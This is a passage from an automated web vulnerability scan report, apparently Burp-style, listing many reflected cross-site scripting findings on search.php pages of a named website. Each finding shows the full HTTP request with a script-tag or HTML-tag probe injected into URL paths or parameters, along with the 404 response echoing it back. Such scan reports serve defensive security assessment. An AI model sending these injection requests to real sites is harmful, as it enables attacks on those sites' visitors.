2.4878. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5a16<script>alert(1)</script>81117ac0502 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesd5a16<script>alert(1)</script>81117ac0502/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesd5a16<script>alert(1)</script>81117ac0502/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4879. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9a511<script>alert(1)</script>94ab8b4f4f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review9a511<script>alert(1)</script>94ab8b4f4f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review9a511<script>alert(1)</script>94ab8b4f4f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4880. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f8880<script>alert(1)</script>8738e64233f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.phpf8880<script>alert(1)</script>8738e64233f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.phpf8880<script>alert(1)</script>8738e64233f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4881. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 711b7<a>2d1488de0f2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search711b7<a>2d1488de0f2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search711b7<a>2d1488de0f2&opt=2 was not found on this server.</p>
...[SNIP]...

2.4882. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6bec6<a>379154bf08b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...6bec6<a>379154bf08b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...6bec6<a>379154bf08b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4883. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2e5b8<script>alert(1)</script>a92f3a7ec4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e5b8<script>alert(1)</script>a92f3a7ec4a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e5b8<script>alert(1)</script>a92f3a7ec4a=1 was not found on this server.</p>
...[SNIP]...

2.4884. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4b0a6<a>93fd573072d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=24b0a6<a>93fd573072d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=24b0a6<a>93fd573072d was not found on this server.</p>
...[SNIP]...

2.4885. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be897<script>alert(1)</script>c7c453e5b22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationbe897<script>alert(1)</script>c7c453e5b22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationbe897<script>alert(1)</script>c7c453e5b22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4886. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40d51<script>alert(1)</script>6a58352d299 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes40d51<script>alert(1)</script>6a58352d299/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes40d51<script>alert(1)</script>6a58352d299/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4887. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d435<script>alert(1)</script>ae44241649f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos3d435<script>alert(1)</script>ae44241649f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos3d435<script>alert(1)</script>ae44241649f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4888. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 67053<script>alert(1)</script>4e7ba3af3a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images67053<script>alert(1)</script>4e7ba3af3a4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images67053<script>alert(1)</script>4e7ba3af3a4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4889. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4ebfc<script>alert(1)</script>c6f7861cee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/search.php4ebfc<script>alert(1)</script>c6f7861cee?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php4ebfc<script>alert(1)</script>c6f7861cee?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4890. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 888e4<a>6fb2decb651 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search888e4<a>6fb2decb651&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search888e4<a>6fb2decb651&opt=2 was not found on this server.</p>
...[SNIP]...

2.4891. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2cde7<a>91d135f54b3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...2cde7<a>91d135f54b3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...2cde7<a>91d135f54b3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4892. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d84c<script>alert(1)</script>3b08bab6e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&2d84c<script>alert(1)</script>3b08bab6e2c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&2d84c<script>alert(1)</script>3b08bab6e2c=1 was not found on this server.</p>
...[SNIP]...

2.4893. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6ae8c<a>4e5b118e111 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26ae8c<a>4e5b118e111 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26ae8c<a>4e5b118e111 was not found on this server.</p>
...[SNIP]...

2.4894. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2665f<script>alert(1)</script>9767cf72d84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation2665f<script>alert(1)</script>9767cf72d84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation2665f<script>alert(1)</script>9767cf72d84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4895. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 414b0<script>alert(1)</script>c9d2b7cfb5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

